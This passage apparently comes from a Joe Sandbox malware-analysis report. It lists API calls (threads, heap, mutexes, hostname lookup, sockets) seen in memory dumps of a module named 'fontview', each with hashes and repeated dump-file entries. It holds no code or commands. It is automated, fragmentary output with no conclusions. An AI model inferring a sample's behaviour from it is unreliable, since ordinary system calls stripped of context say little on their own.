                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread__time64$CloseCreateH_prologHandleTerminate_rand_sprintf
                                                      • String ID:
                                                      • API String ID: 1419693727-0
                                                      • Opcode ID: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
                                                      • Instruction ID: 4a25103f81a40976197cae3d50368f644efecd2bc1ee7d5a155f56b6d39a0099
                                                      • Opcode Fuzzy Hash: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
                                                      • Instruction Fuzzy Hash: 49F049B1801B94AFF7209F658D88993BBE8FB042D5B04482EE5CB02A11C63AAC04CB60
                                                      APIs
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
                                                      • CloseHandle.KERNEL32(?), ref: 1001E0FE
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CloseCreateHandleTerminate
                                                      • String ID:
                                                      • API String ID: 214294483-0
                                                      • Opcode ID: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
                                                      • Instruction ID: 2dd09b30243e208cee3be36777b7a391327da2b40f2e85d95d0c5eab96f726e9
                                                      • Opcode Fuzzy Hash: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
                                                      • Instruction Fuzzy Hash: 8EF05E75404BD4BEE3629B6A8DC8A57FBDCFB45398F05142DF18286921C6B0FCC68721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: gethostbynamegethostnameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 289322838-0
                                                      • Opcode ID: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
                                                      • Instruction ID: 809eef93411cdc36f9b95217684b62963118020cb64196cb20eb42ce4d12313c
                                                      • Opcode Fuzzy Hash: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
                                                      • Instruction Fuzzy Hash: 2BF05E355001157BD701EB64DC45EEE73ACEF09360F0091A5F911CB1E0DB74EA858BA1
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100056B1
                                                      • ReleaseMutex.KERNEL32(?), ref: 100056C9
                                                      • Sleep.KERNELBASE(00000001), ref: 100056DA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MutexObjectReleaseSingleSleepWait
                                                      • String ID:
                                                      • API String ID: 2685543577-0
                                                      • Opcode ID: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
                                                      • Instruction ID: dded88739cd7db52ccc2d7391d290ba0f31111a6fc9c71b8e083dbddec35d66f
                                                      • Opcode Fuzzy Hash: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
                                                      • Instruction Fuzzy Hash: 06F082302157109BFB109B358C0D79773D8EB046E2F504A59F86AD31E4DBB6B940CAA8
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000D570
                                                      • ReleaseMutex.KERNEL32(?), ref: 1000D588
                                                      • Sleep.KERNELBASE(00000001), ref: 1000D590
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MutexObjectReleaseSingleSleepWait
                                                      • String ID:
                                                      • API String ID: 2685543577-0
                                                      • Opcode ID: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
                                                      • Instruction ID: 40aa0b88ac9075472564fd970badd49691fce1c548194cc152243a28c8bc4203
                                                      • Opcode Fuzzy Hash: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
                                                      • Instruction Fuzzy Hash: A4F0A030614E189BEB50AFB48C0969A33E8EB043A6F004705FC66D72D0DF70E800C6A0
                                                      APIs
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
                                                      • CloseHandle.KERNEL32(?), ref: 1001E146
                                                      • CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CloseCreateHandleTerminate
                                                      • String ID:
                                                      • API String ID: 214294483-0
                                                      • Opcode ID: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
                                                      • Instruction ID: 6c47360e48e541f40c0052723e9235e3811fbb2456bc37a5d5909ff28a07795f
                                                      • Opcode Fuzzy Hash: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
                                                      • Instruction Fuzzy Hash: 93E06DB1401BA4BEE3609B699DC895BBFDCFB05399F04542DF18241910C6B8BC40CF20
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100058C4
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10005A51
                                                        • Part of subcall function 1001EAC0: GetNativeSystemInfo.KERNEL32(?,B7A91B76,0000000F), ref: 1001EB35
                                                        • Part of subcall function 1001EAC0: HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
                                                        • Part of subcall function 1001EAC0: _free.LIBCMT ref: 1001EC31
                                                        • Part of subcall function 1001E420: HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F
                                                        • Part of subcall function 1001E420: _free.LIBCMT ref: 1001E4DD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateHeap_free$Concurrency::details::_Concurrent_queue_base_v4::_H_prologInfoInternal_throw_exceptionNativeSystem_malloc
                                                      • String ID:
                                                      • API String ID: 3164855647-0
                                                      • Opcode ID: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
                                                      • Instruction ID: c803a41f29da07c650d3c58594bacb453c4fb1dd27e1a6e1f1a30392c0a1c04b
                                                      • Opcode Fuzzy Hash: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
                                                      • Instruction Fuzzy Hash: A151F3B2802261DED305CF2BCCD1159BFA4FB59314BEA826ED01997A69C7FD5440CF11
                                                      APIs
                                                      • HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F
                                                        • Part of subcall function 1001F4D0: HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
                                                        • Part of subcall function 1001F4D0: _free.LIBCMT ref: 1001F535
                                                        • Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000), ref: 1001F67A
                                                        • Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,00000000), ref: 1001F68E
                                                      • _free.LIBCMT ref: 1001E4DD
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$Heap$Semaphore_free$ErrorFreeLast
                                                      • String ID:
                                                      • API String ID: 728542959-0
                                                      • Opcode ID: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
                                                      • Instruction ID: 800e16aa3107edb63feffa1116bd34484aa86493a69fc312601903e07da96963
                                                      • Opcode Fuzzy Hash: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
                                                      • Instruction Fuzzy Hash: B33110B4405B44DFE360CF64C959B9BBBE4FB04708F008A1DE4AA9B7C1D7B9A548CB91
                                                      APIs
                                                      • GetNativeSystemInfo.KERNELBASE(?,B7A91B76,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E61
                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E7C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      • Opcode ID: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
                                                      • Instruction ID: 59a8315101be3ab263f7812ecb0399de6b67e1f0b14bca8f03ae134136496eb9
                                                      • Opcode Fuzzy Hash: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
                                                      • Instruction Fuzzy Hash: 60115E72944258DFDB04CF98ED85BA9B7F8F709714F40466AE80AD3B50D77AA510CF44
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerH_prologName
                                                      • String ID:
                                                      • API String ID: 2340896887-0
                                                      • Opcode ID: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
                                                      • Instruction ID: 1d68eca033c9043e72de2a4286cf069eb490a1f05f2ee87c86d81987e30c12f2
                                                      • Opcode Fuzzy Hash: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
                                                      • Instruction Fuzzy Hash: 69011AB2D0012DAEDB15DF94D882AEEB7BCEB04344F0040AAA609E3241D7745F888BE0
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
                                                      • _free.LIBCMT ref: 1001F535
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CreateErrorFreeLast_free
                                                      • String ID:
                                                      • API String ID: 910146552-0
                                                      • Opcode ID: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
                                                      • Instruction ID: f604b513f122066b879ad4c2375b27ded08a991e1fe4a324105a739978d0ea99
                                                      • Opcode Fuzzy Hash: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
                                                      • Instruction Fuzzy Hash: D5019DB1200B06ABE3048F25D828B42FBA4BB45309F008219D6448BA80D3FAB568CFD1
                                                      APIs
                                                      • HeapCreate.KERNELBASE ref: 1001F7D5
                                                      • _free.LIBCMT ref: 1001F815
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CreateErrorFreeLast_free
                                                      • String ID:
                                                      • API String ID: 910146552-0
                                                      • Opcode ID: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
                                                      • Instruction ID: 012904b8805aae3dbedbbf78297134198325bffc3ea54a5c621821fb0c9ecd51
                                                      • Opcode Fuzzy Hash: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
                                                      • Instruction Fuzzy Hash: 0701AFB5200B06ABE304CF25D828B42FBB4FB55309F008219D5448BB80D7FAE468CFD1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___copy_path_to_wide_string_free
                                                      • String ID:
                                                      • API String ID: 339592613-0
                                                      • Opcode ID: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
                                                      • Instruction ID: 424f71bbd37a06cd7e57c26e38fcdaf5a0552f039bab1a5dfaedcc90aead64a7
                                                      • Opcode Fuzzy Hash: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
                                                      • Instruction Fuzzy Hash: D2F01C3651010DFFDF028F95DD02DDEBBAAEF093A9F204554FA10A51A0E776DA20EB94
                                                      APIs
                                                      • closesocket.WS2_32(00000000), ref: 10017A62
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 10017A6D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastclosesocket
                                                      • String ID:
                                                      • API String ID: 1278161333-0
                                                      • Opcode ID: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
                                                      • Instruction ID: c10fd3888be95ff44920b7b525900d4ac3c0e5df11b5dd3981ea2acee834d5df
                                                      • Opcode Fuzzy Hash: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
                                                      • Instruction Fuzzy Hash: C0E0EC31400A229BC7109F68E84428A77B1AF45334F61C649E07A865F0C332EDC29A40
                                                      APIs
                                                      • _malloc.LIBCMT ref: 10009E84
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _malloc
                                                      • String ID:
                                                      • API String ID: 1579825452-0
                                                      • Opcode ID: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
                                                      • Instruction ID: 90c222bfae742fec60398cccdc4e1f23cd5be1458402abc6deef91bfde91d8dd
                                                      • Opcode Fuzzy Hash: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
                                                      • Instruction Fuzzy Hash: E2F06771208349AEE354CF69D401B16F7E8EF153A5F20842EE449CB291EBB6E8418BA1
                                                      APIs
                                                      • _free.LIBCMT ref: 100094FC
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
